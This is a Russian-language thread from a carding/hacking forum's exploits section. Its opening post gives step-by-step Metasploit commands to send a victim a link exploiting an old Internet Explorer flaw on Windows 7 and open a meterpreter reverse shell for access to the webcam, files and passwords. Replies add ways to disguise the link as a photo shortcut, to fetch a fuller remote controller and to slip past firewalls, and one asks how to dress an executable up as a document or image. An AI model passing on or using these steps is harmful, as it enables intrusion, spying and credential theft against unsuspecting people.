1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Такой себе эксплойт для IE старой версии

Тема в разделе "Эксплойты", создана пользователем D108, 19 дек 2017.

  1. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    316
    Симпатии:
    104
    Суть в том, что мы скинем нашей жертва ссылку, которая расшатает уязвимость в Windows 7 и мы получим доступ к веб-камере, файлам и паролям. Единственная проблема в том, что она должна открыть её через Internet Explorer старой версии, которая стоит на семёрке.



    Что нам понадобится:

    1. Kali Linux
    2. Metasploit
    3. Знания СИ (социальной инженерии)
    Давайте начнём.

    1. Запускаем Metasploit командой "msfconsole".
    2. Выбираем уязвимость браузера. Пишем в командную строку "use exploit/windows/browser/ms13_037_svg_dashstyle".
    3. Далее нужно узнать свой айпи. Пишем в командной строке "ifconfig".
    4. "Set SRVHOST" и через пробел ip жертвы.
    5. Командой "Show Targets" мы можем посмотреть доступные уязвимости.
    6. Выбираем уязвимость IE 8 on Windows 7 SP1, для этого пишем set target 0 (или номер под которым находиться эта строчка).
    7. Выбираем вирус который будет залит жертве. "set PAYLOAD windows/meterpreter/reverse_tcp".
    8. "Set LHOST" и ваш ip, который вы узнали командой ifconfig.
    9. Выполняем команду "exploit".
    10. У вас отобразится ссылка, которую нужно будет отправить жертве. После открытия у неё ничего не отобразится, никакие файлы скачиваться не будут, а вы получите доступ к компьютеру.
     
  2. Marina

    Marina

    Регистрация:
    18 май 2018
    Сообщения:
    4
    Симпатии:
    1
    с IE не проблема, я делала так, создать ярлык - > путь “C:\Program Files\Internet Explorer\iexplore.exe” “<ссылка сгенерированная эксплойтом>”, меняла иконку ярлыка на фотку и впихивала жертве, вуаля
     
  3. Paradox

    Paradox

    Регистрация:
    1 июн 2018
    Сообщения:
    5
    Симпатии:
    0
    Прикольно. Марина, ты походу еще та крутыха
     
  4. pepsi3d

    pepsi3d

    Регистрация:
    31 мар 2018
    Сообщения:
    29
    Симпатии:
    0
    Автор добавь самый омерзительный и обезнадеживающий пунк: вы получите доступ к жетве только на тот момент, пока жертва не закрыла вкладку с метасплоит ссылкой.
     
  5. Jsoah

    Jsoah

    Регистрация:
    5 июл 2018
    Сообщения:
    5
    Симпатии:
    0
    Какой-то фак для самых маленьких получился. Автор не в обиду, для тех, кто и правда не в курсе пост получился полезным. Одно только но:
    1. "Kali Linux" - вовсе не обязательно. msf вполне можно запустить и на других nix-ах, и на mac и даже на форточках.
    2. "Выбираем вирус который будет залит жертве" - meterpreter не совсем то "вирус" в полном понимании слова, это нагрузка, выполняемая в процессе эксплуатации (точно не помню - врать не буду, но вроде ms13_037_svg_dashstyle - использует переполнение буфера в лисе, и далее указатель уходит на сгенерированный шеллкод). Немного актуальнее - сразу после старта meterpreter загнать download_exec с уже полноценным "контроллером", ибо как сказал Войти или зарегистрироваться, чтобы увидеть ссылку. "вы получите доступ к жетве только на тот момент, пока жертва не закрыла вкладку с метасплоит ссылкой" - а это очень недолго.
    3. reverse_tcp - не всегда обойдет firewall, разумнее использовать reverse_https.
    заранее прошу прощение за "умничество", надеюсь кому-то полезно. Давайте закончим.
     
  6. Jsoah

    Jsoah

    Регистрация:
    5 июл 2018
    Сообщения:
    5
    Симпатии:
    0
    прошу прощения: конечно не "лис" а "ослик"
     
  7. Slovozaslovo

    Slovozaslovo

    Регистрация:
    22 дек 2017
    Сообщения:
    43
    Симпатии:
    0
    Уважаемые формульчане помогите с вопросом возможно ли из exe сделать doc или jpg. @bestminerr смогу вас отблагодарить
     

Поделиться этой страницей

Загрузка...